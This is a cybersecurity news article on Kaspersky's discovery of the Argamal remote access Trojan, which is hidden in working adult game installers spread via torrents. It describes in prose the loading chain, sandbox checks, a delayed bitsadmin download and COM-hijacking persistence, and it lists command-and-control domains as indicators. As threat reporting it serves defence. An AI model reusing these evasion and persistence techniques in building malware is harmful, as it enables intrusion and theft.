Hackers Hide New Argamal Malware Inside Working Hentai Games
Hackers hide new Argamal malware inside working hentai games distributed via adult sites and torrents.
Summary
Kaspersky has discovered a new remote access Trojan (RAT) named Argamal, hidden within installers for hentai video games. These malicious installers distribute fully functional games via adult sites and torrents, tricking users into installing the malware which grants attackers full remote control. The malware is designed to evade detection and maintain persistence, enabling activities like data theft, credential harvesting, and cryptocurrency theft.
Full text
Security Gaming Malware Scams and FraudHackers Hide New Argamal Malware Inside Working Hentai Games Kaspersky found Argamal malware hidden in hentai game installers, giving hackers remote access through working games shared on adult sites and torrents. byDeeba AhmedJune 14, 20262 minute read Cybersecurity firm Kaspersky has discovered a new campaign delivering malware to people downloading adult video games. Detected in April 2026, Kaspersky’s investigation suggests that this malware is named Argamal, and it is hidden inside hentai game installers. Argamal is a remote access Trojan (RAT) that allows hackers to remotely control a person’s computer. Researchers note that Normal internet scams usually give you a broken file that will not open. These infected downloads actually include fully working games built on common systems like RenPy or RPG Maker. The game runs exactly as you want it to, so you never realise your machine is under someone’s control. How the Attack Works These malicious files are distributed via different platforms such as adult game sites, file-sharing platforms like PixelDrain, and torrent trackers such as AniRena. The game archive, when downloaded, launches a rigged version of a standard library file called FFmpeg DLL and another file named natives2_blob.bin right after the game starts. This rigged library loads into the computer memory without any warning screens popping up, and immediately runs a PowerShell script. To avoid detection, the script first checks the system for monitoring tools like Sandboxie or Procmon64. Malicious game torrent in AniRena (Source: Kaspersky Securelist) If the computer seems safe, the malware waits. Three days later, a scheduled task opens and uses a tool called bitsadmin.exe to download an encrypted file (zaesdl.dat) from GitHub, and decrypts it using AES-CBC encryption to create the main Trojan module. To ensure persistence on the device, the malware uses COM hijacking. It alters the registry entries for a real Windows feature called the Windows Color System Calibration Loader. This feature runs every time a user logs into their PC, meaning the malware automatically starts up during every new user session. What Hackers Can Do Argamal malware immediately sends UDP heartbeats (updates) to attackers’ servers once active on the device. These servers are hosted on domains such as asper1.freeddns.org and Winst0.kozow.com. This allows the attackers full control over the system. They can now perform malicious activities of all sorts, ranging from stealing files, reading private chats, and gathering financial data to taking screenshots, swapping crypto-wallet addresses, and streaming live videos. Game archive contents (Source: Kaspersky Securelist) Kaspersky has detected hundreds of users infected so far, mostly in Russia, Brazil, Germany, and Vietnam. Code analysis suggests that the attackers speak Spanish. A crucial finding is that the malware purposefully avoids targeting users in China. Nevertheless, all users of Hentai games must avoid unverified adult sites and use real-time security software. (Photo by Urim Pormeia on Unsplash) Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts ArgamalCyber AttackCybersecurityFraudgamingHentaiKasperskyMalwareRATScamTorrents Leave a Reply Cancel reply View Comments (0) Related Posts Hacking News Security ISIS supporters hack Chile’s Ministry of Defense website Isis supporter compromised Chile’s Ministry of Defense website on Monday night and left a message “Hacked” on its… byPushpa Mishra News Privacy Security Surveillance World’s top websites record all your browsing movements It is a widely known fact that a majority of websites keep a record of the number of… byWaqas Read More Data Breaches Artificial Intelligence Security Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches Verizon DBIR 2026 reveals software vulnerabilities overtook stolen passwords in cyberattacks, with AI helping hackers exploit flaws within hours. byDeeba Ahmed Cyber Crime Phishing Scam Scams and Fraud Social Media “New Facebook Message” Email Not Only Drops Malware But Phish You If you receive an email claiming to have a ”new message” from Facebook just delete it because the… byCarolina
Indicators of Compromise
- domain — asper1.freeddns.org
- domain — Winst0.kozow.com
- malware — Argamal